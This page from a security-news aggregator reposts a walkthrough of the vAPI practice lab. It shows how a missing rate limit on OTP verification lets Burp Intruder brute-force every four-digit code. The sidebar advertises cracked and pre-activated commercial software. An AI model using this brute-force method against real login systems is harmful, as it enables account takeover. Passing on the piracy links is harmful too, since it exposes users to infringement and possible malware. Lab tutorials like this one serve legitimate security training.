LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Lack of Rate Limiting in vAPI

11 months ago 51
BOOK THIS SPACE FOR AD
ARTICLE AD

Here we are again with another detailed walkthrough on another topic this time we will be talking about the Lack of rate limiting in vAPI.

Make sure your project (vAPI, Postman, Burpsuite) is installed and configured properly so we can directly head to exploitation.

Definition:

When the API does not limit the number of requests from a specific API client, it is said to be lacking resources and rate limiting, such vulnerabilities help us to do brute force kind of attacks.

Understanding the scenario:

Let’s start our hunt by understanding the attack vector and analysing the request structure in Postman. From the request structure, we can understand that instead of username and password, this app is using an OTP-based log-in system. There are a total of 3 requests: one for generating OTP, one for authenticating OTP, and the last one for resource access.

We can see in the OTP generation request that one number is already filled and will be considered the standard one, so now that neither we have that number nor we can have OTP to get the resource access, what do we do now?

In the OTP verification request, we can see only OTP is getting sent as a parameter in the request body, and this is something interesting that we would like to dig into.

By following the given request order, we first sent an OTP-generating request, and to check for weakness, we sent multiple arbitrary OTP requests with random digits. Then we knew that we could send as many OTP authentication requests as we wanted, there is no rate-limiting mechanism in place to stop me from sending requests after some failed attempts. That’s what we wanted, this is a potential request that can be exploited by an intruder.

The third request is only for accessing resources after successful authentication.

Attack:

First send an OTP generation request; for an OTP authentication request to work, it is essential. Then send an OTP authentication request and capture the request into the burp suite. send the request to the intruder and perform a brute force attack on the OTP value using the intruder.

Attack type = sniperPayload position to otp valuePayload type = numbersValue = 0000 to 9999 with step 1Start the attack

one the attack is completed analyze responses with status codes other than 401.

Read Entire Article
  3. Lack of Rate Limiting in vAPI

Related

21.3 Lab: SSRF via OpenID dynamic client registration | 2024

21.3 Lab: SSRF via OpenID dynamic client registration | 2024

An easy way to find bugs: Enter wrong data

An easy way to find bugs: Enter wrong data

An Email Authentication Bypass, But Marked as N/A in NASA domain

An Email Authentication Bypass, But Marked as N/A in NASA domain

Walk Through of Bepractical.tech lab #2

Walk Through of Bepractical.tech lab #2

How I found a IDOR at Monitor Mozilla ?

How I found a IDOR at Monitor Mozilla ?

ZoneTransfer — ./Hope

ZoneTransfer — ./Hope

Trending

1. Tottenham
2. Sanjiv Goenka
3. Vazhakku
4. Varanasi
5. OpenAI
6. Maldives
7. Zomato share price
8. 11th Result 2024
9. Liverpool
10. DC vs LSG

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved